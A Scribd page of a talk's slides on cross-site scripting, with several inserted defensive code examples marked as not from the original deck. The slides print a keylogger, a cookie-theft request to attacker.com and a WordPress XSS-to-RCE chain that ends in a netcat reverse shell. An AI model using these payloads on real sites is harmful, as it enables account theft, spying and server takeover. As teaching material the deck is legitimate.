For The Win!: @brutelogic

This document discusses cross-site scripting (XSS) vulnerabilities and what can be done with them. It begins with an introduction to XSS, describing how JavaScript code can be executed by an attacker in a victim's browser. It then outlines several dangers of XSS, including virtual defacement, leakage and spying of private information, account stealing, using the vulnerability as a memory corruption vector, creating XSS worms, and compromising content management systems. The document provides examples of code to demonstrate keylogging, cookie theft, and using an XSS flaw to achieve remote code execution on a WordPress site. It concludes with some less dangerous outcomes of XSS and notes on how easily XSS payloads can be delivered.

Uploaded by

gijay
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
137 views43 pages

For The Win!: @brutelogic

This document discusses cross-site scripting (XSS) vulnerabilities and what can be done with them. It begins with an introduction to XSS, describing how JavaScript code can be executed by an attacker in a victim's browser. It then outlines several dangers of XSS, including virtual defacement, leakage and spying of private information, account stealing, using the vulnerability as a memory corruption vector, creating XSS worms, and compromising content management systems. The document provides examples of code to demonstrate keylogging, cookie theft, and using an XSS flaw to achieve remote code execution on a WordPress site. It concludes with some less dangerous outcomes of XSS and notes on how easily XSS payloads can be delivered

Uploaded by

gijay
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 43

XSS For the win!

What can be really done with Cross-Site Scripting

by @brutelogic
Whoami

● Security Researcher at Sucuri Security (a GoDaddy company)
● XSS, filter/WAF bypass and… bash!
● Helped to fix more than 1000 XSS vulnerabilities on the web
● Currently developing/maintaining KNOXSS, an online XSS tool
Agenda

● Fast Intro to XSS
● Dangers of XSS
  ○ Virtual Defacement
  ○ LSD - Leakage, Spying and Deceiving
  ○ Account Stealing
  ○ Memory Corruption Vector
  ○ XSS Worm
  ○ CMS Pwnage
● Miscellaneous
Fast Intro to XSS
Definition

● XSS is JavaScript code executed by an attacker in the victim's browser
● Browsers use a programmatic (object-oriented) model of HTML documents called the DOM (Document Object Model), where every markup element is a DOM node
● Almost anything done in a browser is performed only by, or also by, JavaScript

Fast Intro to XSS
Classical Example

● Vulnerable PHP source code (the "user" parameter is echoed into HTML without encoding)

    <?php
    // Deliberately vulnerable: $username is reflected into the page unencoded
    $username = $_GET["user"];
    echo "<h1>Hello, $username!</h1>";
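As an added example (not code from the original deck), the hardened counterpart of the echo above, written for Node.js; the PHP fix itself is htmlspecialchars($username, ENT_QUOTES, 'UTF-8'). The function names are this example's own.

```javascript
// Added example (not from the original deck): the safe counterpart of the
// vulnerable PHP echo above, written for Node.js. The PHP fix itself is
// htmlspecialchars($username, ENT_QUOTES, 'UTF-8'). Function names are
// this example's own.

// Encode the five characters that can break out of an HTML text node or a
// quoted attribute. This is output encoding for the HTML context only; a
// value placed inside a <script> block or a URL needs a different encoder.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering, mirroring: echo "<h1>Hello, $username!</h1>";
function renderGreetingUnsafe(username) {
  return `<h1>Hello, ${username}!</h1>`;
}

// Hardened rendering: the same template with the user value encoded on output.
function renderGreetingSafe(username) {
  return `<h1>Hello, ${escapeHtml(username)}!</h1>`;
}

// True if the rendered HTML still contains a raw <script ...> or </script> tag.
function containsRawScriptTag(html) {
  return /<\/?script[\s>]/i.test(html);
}

// Constructed inputs: the benign "John" from the slides and a script-block payload.
const BENIGN_INPUT = 'John';
const SCRIPT_INPUT = '<script>alert(1)</script>';

console.log(renderGreetingUnsafe(SCRIPT_INPUT)); // the tag reaches the page as markup
console.log(renderGreetingSafe(SCRIPT_INPUT));   // the tag is displayed as literal text
```

Encoding on output rather than filtering on input keeps the stored value intact and makes only its HTML rendering inert.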


Fast Intro to XSS
Classical Example

● Reflection of user-controlled input "John"
● Execution of script block via user input

Fast Intro to XSS
Main Types

● Server based: the attack comes in the server's response (99.99% of the time in the source code), either directly with the input (reflected) or indirectly via previously saved input (stored);
● Client based: rogue input is handled by the page's own (native) JavaScript code and gets executed directly or indirectly in the same way as above. Also known as DOM-based XSS.
Dangers of XSS
Virtual Defacement

Let's take the blue pill.

Virtual Defacement

● XSS that alters the visual of the page for the victim, spreading the attacker's message or fake news
● Might impact a business or influence someone's decision (like buying/selling stocks or BTC)
Simple defacement injection

    <img src=//attacker.com/picture.jpg style=width:100%;height:100%>

"Loss! Hacker known as 'Brute Logic' steals a fortune from Globo's journalist" (headline)

Targeted code

    <iframe
      onload="parent.frames[0].document.getElementsByTagName('h1')[1].innerHTML='Prejuizo! Hacker conhecido como \'Brute Logic\' rouba verdadeira fortuna de jornalista global'"
      style="border:0;position:absolute;top:0;left:0;right:0;bottom:0;width:100%;height:100%"
      src="//www.tribunahoje.com/noticia/148537/entretenimento/2015/07/17/prejuizo-hacker-rouba-verdadeira-fortuna-de-jornalista-global.html">
LSD
Leakage, Spying and Deceiving

Trust no one.

LSD - Leakage, Spying and Deceiving

● Leakage: any private info accessible by JS is easily exfiltrated
● Spying: whatever the victim types can be logged and sent anywhere
● Deceiving: by presenting a fake login form, the victim's credentials are taken
XSS Keylogger

$ cat k.js

    // Collect keystrokes and send them to the collecting endpoint once per second
    keys = '';
    document.onkeypress = function(e) {
      get = window.event ? event : e;                   // legacy IE vs. standard event object
      key = get.keyCode ? get.keyCode : get.charCode;
      key = String.fromCharCode(key);
      keys += key;
    }
    setInterval(function(){
      new Image().src = '//localhost/keylogger/k.php?k=' + keys;   // exfiltration via an image request
      keys = '';
    }, 1000);

$ cat k.php

    <?php
    // Append whatever arrives in the "k" parameter to a local log file
    $k = $_GET["k"];
    if (!empty($k)) {
      $f = fopen("log.txt", "a+");
      fwrite($f, $k);
      fclose($f);
    }

Keylogging with XSS
Account Stealing

My other account is your account.

Account Stealing

● Session cookies can be exfiltrated (except HttpOnly ones)
● Unprotected password/email/phone number change functionality can be abused to compromise the account

Short JS code to steal cookies:

    fetch('//attacker.com/?cookie=' + document.cookie)

Unprotected password change in wordpress.com
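As an added example (not from the original deck), a Node.js audit of Set-Cookie headers for the flags that decide what the cookie one-liner above can actually read; the sample headers are constructed and the function names are this example's own. HttpOnly keeps a cookie out of document.cookie but not out of requests the injected script sends with the victim's session, which is exactly what the unprotected password-change abuse relies on.

```javascript
// Added example (not from the original deck): audits Set-Cookie headers for the
// flags that decide what the one-liner above can actually read. Sample headers
// are constructed; function names are this example's own.

// Parse one Set-Cookie header into name, value and a lower-cased attribute map.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? '' : pair.slice(eq + 1);
  const flags = {};
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    flags[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return { name, value, flags };
}

// Findings for one header; an empty list means all three protections are present.
function auditSetCookie(header) {
  const { name, flags } = parseSetCookie(header);
  const findings = [];
  if (!flags.httponly) findings.push(`${name}: missing HttpOnly (readable via document.cookie)`);
  if (!flags.secure) findings.push(`${name}: missing Secure (also sent over plain HTTP)`);
  const ss = typeof flags.samesite === 'string' ? flags.samesite.toLowerCase() : '';
  if (ss !== 'lax' && ss !== 'strict') findings.push(`${name}: SameSite not Lax or Strict`);
  return findings;
}

// What document.cookie would expose for a set of response headers: only cookies
// without HttpOnly are visible to script, and therefore to an injected payload.
function visibleToDocumentCookie(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.flags.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed samples: a session cookie set without any flags and a hardened one.
const WEAK_HEADER = 'sid=abc123; Path=/';
const HARDENED_HEADER = 'PHPSESSID=def456; Path=/; Secure; HttpOnly; SameSite=Lax';

console.log(auditSetCookie(WEAK_HEADER));
console.log(visibleToDocumentCookie([WEAK_HEADER, HARDENED_HEADER, 'theme=dark; Path=/']));
```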
Memory Corruption Vector

Welcome to my box.

Memory Corruption Vector

● By simply firing a request to a server hosting a browser exploit, an attacker can compromise the victim's underlying machine.

Metasploit Browser Autopwn 2 loaded

Unleashing the Metasploit beast:

    <img src=//attacker.com>
XSS Worm

XSS is my hero.

XSS Worm

● Rogue JS code can spread itself across the database of a web app
● Exponential growth in social apps, with the possibility of total compromise
● A worm in action can be seen here (lab experiment)
CMS Pwnage

Hey admin, give me admin!

CMS Pwnage

● If an administrator of a CMS install gets XSSed, RCE is straightforward
● Get the anti-CSRF token, then submit with it to edit or upload code to the server

https://w3techs.com/technologies/overview/content_management/all

Wordpress 4.8 - XSS to RCE

● Targeting the Hello Dolly plugin, vanilla install
● 200 OK for /wordpress/wp-content/plugins/hello.php
Wordpress 4.8 - XSS to RCE
● Defining some vars (path, file and payload)

    p = '/wordpress/wp-admin/plugin-editor.php?';
    q = 'file=hello.php';
    s = '<?=`nc attacker.com 5855 -e /bin/bash`;'; // reverse shell to attacker.com:5855

Wordpress 4.8 - XSS to RCE
● Grabbing the anti-CSRF token (_wpnonce) and preparing the content update

    a = new XMLHttpRequest();
    a.open('GET', p+q, 0);   // synchronous request, so the response is available right after send()
    a.send();
    $ = '_wpnonce=' + /nonce" value="([^"]*?)"/.exec(a.responseText)[1] + '&newcontent=' + s + '&action=update&' + q;

Wordpress 4.8 - XSS to RCE
● Submitting the plugin edit

    b = new XMLHttpRequest();
    b.open('POST', p+q, 1);
    b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    b.send($);
Wordpress 4.8 - XSS to RCE
● Executing the payload by firing a request

    b.onreadystatechange = function(){
      if (this.readyState == 4) {   // update request completed
        fetch('/wordpress/wp-content/plugins/hello.php');
      }
    };
Opening a netcat shell after triggering a stored XSS in WP
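As an added example that is not from the original deck, the following Node.js detector flags, over constructed access-log lines, the request sequence the chain above leaves behind: a read of plugin-editor.php, a POST to it, then a fetch of the edited plugin file, all from one client within a short window. The log format (ip, ISO time, method, path, status) and the function names are assumptions for this example.

```javascript
// Added example (not from the original deck): a detector, run over constructed
// access-log lines, for the request sequence the chain above produces: a GET of
// plugin-editor.php (nonce read), a POST to it (content update), then a request
// for the edited plugin file, all from one client within a short window. The
// log format (ip, ISO time, method, path, status) and names are assumptions.

// Constructed log lines: 10.0.0.5 performs the full chain within seconds;
// 10.0.0.9 is an administrator who only opens the editor and moves on.
const LOG_LINES = [
  '10.0.0.5 2017-07-17T10:00:01Z GET /wordpress/wp-admin/plugin-editor.php?file=hello.php 200',
  '10.0.0.5 2017-07-17T10:00:02Z POST /wordpress/wp-admin/plugin-editor.php?file=hello.php 302',
  '10.0.0.5 2017-07-17T10:00:03Z GET /wordpress/wp-content/plugins/hello.php 200',
  '10.0.0.9 2017-07-17T10:05:00Z GET /wordpress/wp-admin/plugin-editor.php?file=hello.php 200',
  '10.0.0.9 2017-07-17T10:07:00Z GET /wordpress/wp-admin/plugins.php 200',
];

function parseLine(line) {
  const [ip, ts, method, path, status] = line.split(' ');
  return { ip, t: Date.parse(ts) / 1000, method, path, status: Number(status) };
}

// One alert per client that reads the editor, posts to it and then fetches the
// edited file within windowSec. The action=update field travels in the POST
// body, which access logs do not record, so the detector keys on method and path.
function detectPluginEditorChain(lines, windowSec = 60) {
  const byIp = new Map();
  for (const e of lines.map(parseLine)) {
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }
  const alerts = [];
  for (const [ip, events] of byIp) {
    events.sort((a, b) => a.t - b.t);
    events.forEach((post, i) => {
      if (post.method !== 'POST' || !post.path.includes('/wp-admin/plugin-editor.php')) return;
      const m = /[?&]file=([^&]+)/.exec(post.path);
      if (!m) return;
      const readBefore = events.slice(0, i).some((e) =>
        e.method === 'GET' && e.path.includes('/wp-admin/plugin-editor.php') && post.t - e.t <= windowSec);
      const execAfter = events.slice(i + 1).find((e) =>
        e.path.endsWith('/wp-content/plugins/' + m[1]) && e.t - post.t <= windowSec);
      if (readBefore && execAfter) alerts.push({ ip, file: m[1], at: execAfter.t });
    });
  }
  return alerts;
}

console.log(detectPluginEditorChain(LOG_LINES));
```

Disabling the file editor (DISALLOW_FILE_EDIT in wp-config.php) removes the endpoint this chain depends on; the detector is for installs that keep it.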
Miscellaneous

● Less Dangerous Outcomes
  1. Forced download of files
  2. Denial of Service
  3. Attacks on mobile or requiring user permission (geolocation, audio/video capture, plugin install, etc.)

Miscellaneous

● Ease of XSS Delivery
  1. Easily shared on social networks
  2. Disguised by URL shortening services
  3. Spam, spear phishing and watering hole

Miscellaneous

● References

http://brutelogic.com.br/blog
http://brutelogic.com.br/cheatsheet
https://youtu.be/i8mTYicEQrI
https://youtu.be/26V01iIjeGk
Thank
You!
#hack2learn
